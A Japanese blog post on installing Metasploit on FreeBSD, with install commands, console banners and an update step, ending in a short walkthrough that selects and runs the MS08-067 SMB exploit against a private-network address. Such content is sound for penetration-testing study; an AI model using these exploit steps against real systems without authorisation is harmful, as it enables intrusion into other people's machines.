FreeBSD Metasploitをインストールしてみよう
スポンサーリンク
このドキュメントの内容は、以下の通りです。
Metasploit プロジェクトは、- ペネトレーションテスト
- IDS シグネチャの開発
- exploit の研究 をする人々に有益な情報を提供することをゴールとしています。
2003年以降は、Ruby が使われるようになりました。
FreeBSD に metasploit をインストール
インストール
cd /usr/ports/security/metasploit/ sudo make install clean
portinstallコマンドでインストールする場合
sudo portinstall /usr/ports/security/metasploit/
portmasterコマンドでインストールする場合
sudo portmaster -y -d /usr/ports/security/metasploit/
参考サイト
メモ
nmap も依存関係のようです。
===>>> The following actions will be taken if you choose to proceed:
Install security/metasploit
Upgrade nasm-2.09.10,1 to nasm-2.10.03,1
Install devel/ncurses
Upgrade nmap-5.61.t5 to nmap-6.01
Upgrade pcre-8.31 to
pcre-8.31_1
インストール先
FreeBSD の場合、下記ディレクトリにインストールされています。
/usr/local/share/metasploit
動かし方
msfd を起動する
まずは、 msfd を起動します。
cd /usr/local/share/metasploit sudo msfd パスワード: [*] Initializing msfd... [*] Running msfd...
msfconsole を動かす
薫% ./msfconsole 23:24[vm2 /usr/local/share/metasploit]
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.1.0-release [core:4.1 api:1.0]
+ -- --=[ 748 exploits - 383 auxiliary - 92 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r13992 updated 355 days ago (2011.10.18)
Warning: This copy of the Metasploit Framework was last updated 355 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf >
ファイルの更新方法
随分と、古いということなので、 svn で更新することにしました。
cd /usr/local/share/metasploit sudo svn upgrade
msfconsole を動かす
もう一度、msfconsole を起動します。
薫% msfconsole 0:07[vm2 /usr/local/share/metasploit]
______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V4 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *
^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
=[ metasploit v4.1.0-release [core:4.1 api:1.0]
+ -- --=[ 748 exploits - 383 auxiliary - 92 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
msf >
良い感じで起動しました。
つかえるexploitを表示します。
show exploits
exploit を選択します。
use windows/smb/ms08_067_netapi
実際の画面では、こんな感じ。
msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >
exploit のオプションを確認します。
show options
対象ホストを設定します。
set RHOST 192.168.0.100
攻撃対象のOSの種類を選択するために、まず候補を確認します。
show targets
show targets でわかった、対象のOSのバージョンを指定します。
set target 51
実際に exploit を実行します。
exploit
実践 Metasploit ―ペネトレーションテストによる脆弱性評価
Hacking: 美しき策謀 第2版 ―脆弱性攻撃の理論と実際
続・ハッキングの達人 (白夜ムック)
Nessus入門(ネットワーク脆弱性試験ツール活用術)
アナライジング・マルウェア ―フリーツールを使った感染事案対処 (Art Of Reversing)
Metasploit Project
スポンサーリンク
スポンサーリンク
いつもシェア、ありがとうございます!
もっと情報を探しませんか?
関連記事
最近の記事
- パナソニック ジェットウォッシャードルツ EW-DJ61-Wのホースの修理
- LinuxセキュリティモジュールIntegrity Policy Enforcement
- アマゾンのEcho Show 5を買ったのでレビューします
- アマゾンのサイバーマンデーはAlexa Echo Show 5が安い
- Android スマートフォン OnePlus 7T と OnePlus 7の違い
- Android スマートフォン OnePlus 7 をAndroid10にアップデートしてみた
- クレジットカードのバーチャルカードの比較のまとめ
- 活動量計 Xiaomi Mi Band 4を買ってみたのでレビュー
- Android スマートフォン OnePlus 7 のレビュー
- AliExpressでスマートフォンを買い物してみた
- パソコンのホコリ対策 レンジフードフィルターと養生テープ
- 80PLUS GOLDのPC電源ユニットAntec NeoEco 750 Goldのレビュー
- イギリスの付加価値税 VAT は払い戻しを受けられる
- イギリスのロンドンでスーツケースなど荷物を預けられる場所は
- イギリスのロンドンで地下鉄やバスに乗るならオイスターカードを使おう
- イギリスのヒースロー空港からロンドン市内への行き方
- 航空便でほかの航空会社に乗り継ぎがある場合のオンラインチェックイン
- SFC会員がANA便ではなくベトナム航空のコードシェアを試して解ったこと
- ベトナムの入国審査でeチケットの掲示が必要だった話
- シアトルの交通ICカードはオルカカード(Orca)です
人気のページ
- Windows7 IME 辞書ツールで単語の登録に失敗しました
- C言語 popen()でコマンドを実行して出力を読み込む
- Windows7で休止状態にする方法
- CentOS MySQLの起動、停止、再起動
- loggerコマンドでsyslogにエラーを出力する方法
- パソコンパーツの買取をしてくれる店のまとめ
- Java Mapの使い方 get(),put(),remove(),size(),clear()
- 楽天のRポイントカードを作ってみた
- iPhone 5 から iPhone 6 に乗り換えたのでレビュー
- netstatコマンドのステータスの意味
スポンサーリンク
過去ログ
2020 : 01 02 03 04 05 06 07 08 09 10 11 122019 : 01 02 03 04 05 06 07 08 09 10 11 12
2018 : 01 02 03 04 05 06 07 08 09 10 11 12
2017 : 01 02 03 04 05 06 07 08 09 10 11 12
2016 : 01 02 03 04 05 06 07 08 09 10 11 12
2015 : 01 02 03 04 05 06 07 08 09 10 11 12
2014 : 01 02 03 04 05 06 07 08 09 10 11 12
2013 : 01 02 03 04 05 06 07 08 09 10 11 12
2012 : 01 02 03 04 05 06 07 08 09 10 11 12
2011 : 01 02 03 04 05 06 07 08 09 10 11 12
2010 : 01 02 03 04 05 06 07 08 09 10 11 12
2009 : 01 02 03 04 05 06 07 08 09 10 11 12
2008 : 01 02 03 04 05 06 07 08 09 10 11 12
2007 : 01 02 03 04 05 06 07 08 09 10 11 12
2006 : 01 02 03 04 05 06 07 08 09 10 11 12
2005 : 01 02 03 04 05 06 07 08 09 10 11 12
2004 : 01 02 03 04 05 06 07 08 09 10 11 12
2003 : 01 02 03 04 05 06 07 08 09 10 11 12